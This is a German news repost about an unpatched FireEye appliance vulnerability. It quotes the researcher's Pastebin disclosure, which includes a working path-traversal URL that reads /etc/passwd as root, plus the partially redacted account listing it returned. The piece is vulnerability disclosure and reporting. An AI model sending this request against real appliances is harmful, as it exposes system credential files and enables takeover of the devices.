Alert! Seit 18 Monaten ungepatcht: Schwere Sicherheitslücke in FireEye-Hardware

Posted on Posted in Hacker News

Die verschiedenen Sicherheits-Appliances von FireEye sollen das Netz des Kunden vor Angriffen schützen, auf Grund einer schwerwiegenden Sicherheitslücke könnten sie jetzt selbst zu Opfern von Hackern werden.

Sicherheits-Appliances von FireEye enthalten eine schwere Sicherheitslücke, die es Angreifern erlaubt, die Geräte von außen komplett zu übernehmen. Sicherheitsforscher Kristian Erik Hermansen hat nach eigenen Angaben über 18 Monate lang ohne Erfolg versucht, die Sicherheitsfirma zum Schließen dieser und weiterer Lücken zu bewegen. Da nichts passiert sei, mache er die erste Lücke nun öffentlich, schreibt er in einem Pastebin-Post.

Laut Hermansen kann man unter Kenntnis der richtigen URL mit Root-Rechten auf das Dateisystem der Systeme zugreifen. Das sei möglich, da der Webserver der Software mit Root-Rechten läuft. Der Angreifer kann so die Passwörter für das zu Grunde liegende Unix-System auslesen und die Kontrolle übernehmen. Dazu muss man die Appliance freilich erreichen können.

FireEye bald unter Feuer?

Bis jetzt gibt es keinen Patch. FireEye bestätigte gegenüber heise Security die Lücke, gab aber zu bedenken, dass sie bis jetzt nicht aktiv für Angriffe ausgenutzt werde. Man informiere seine Kunden nur dann über Lücken, wenn diese bereits in freier Wildbahn genutzt werden.

Welche FireEye-Produkte die Lücke im Detail aufweisen, lies der Entdecker der Schwachstelle offen. FireEye stellt eine Reihe von Appliances zum Absichern von E-Mail-Systemen, von Endbenutzer-Rechnern und von ganzen Netzwerken her. Zum Teil sind die Systeme dabei als erste Verteidigungslinie direkt den Angriffsvektoren ausgesetzt und somit Primärziele.

Quelle: heise.de


Pastebin:

Just one of many handfuls of FireEye / Mandiant 0day. Been sitting on this for more than 18 months with no fix from those security "experts" at FireEye. Pretty sure Mandiant staff coded this and other bugs into the products. Even more sad, FireEye has no external security researcher reporting process.
 
FireEye appliance, unauthorized remote root file system access. Oh cool, web server runs as root! Now that's excellent security from a _security_ vendor 🙂 Why would you trust these people to have this device on your network?!?!?
 
https://fireeyeapp/script/NEI_ModuleDispatch.php?module=NEI_AdvancedConfig&function=HapiGetFileContents&name=../../../../../../../../../../../etc/passwd&extension=&category=operating%20system%20logs&mode=download&time=...&mytoken=...
 
...
 
root:aaaaa:16209:0:99999:7:::
bin:*:15628:0:99999:7:::
daemon:*:15628:0:99999:7:::
adm:*:15628:0:99999:7:::
lp:*:15628:0:99999:7:::
sync:*:15628:0:99999:7:::
shutdown:*:15628:0:99999:7:::
halt:*:15628:0:99999:7:::
mail:*:15628:0:99999:7:::
uucp:*:15628:0:99999:7:::
operator:*:15628:0:99999:7:::
games:*:15628:0:99999:7:::
gopher:*:15628:0:99999:7:::
ftp:*:15628:0:99999:7:::
nobody:*:15628:0:99999:7:::
vcsa:!!:16209::::::
rpc:!!:16209:0:99999:7:::
saslauth:!!:16209::::::
postfix:!!:16209::::::
rpcuser:!!:16209::::::
nfsnobody:!!:16209::::::
apache:!!:16209::::::
ntp:!!:16209::::::
lighttpd:!!:16209::::::
sshd:!!:16209::::::
mailnull:!!:16209::::::
smmsp:!!:16209::::::
openvpn:!!:16209::::::
tcpdump:!!:16209::::::
applianceuser:<redacted>:16209:0:99999:7:::
rproxy:aaaaa:16209:0:99999:7:::
sfserver:aaaaa:16209:0:99999:7:::
provisioning:aaaaa:16209:0:99999:7:::
upgrayedd:aaaaa:16209:0:99999:7:::
sftasker:aaaaa:16209:0:99999:7:::
felistener:aaaaa:16209:0:99999:7:::
lighthouse:aaaaa:16209:0:99999:7:::
crlfactory:aaaaa:16209:0:99999:7:::
panlistener:aaaaa:16209:0:99999:7:::
fireeye:<redacted>:16209:0:99999:7:::
 
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
Facebooktwittergoogle_plus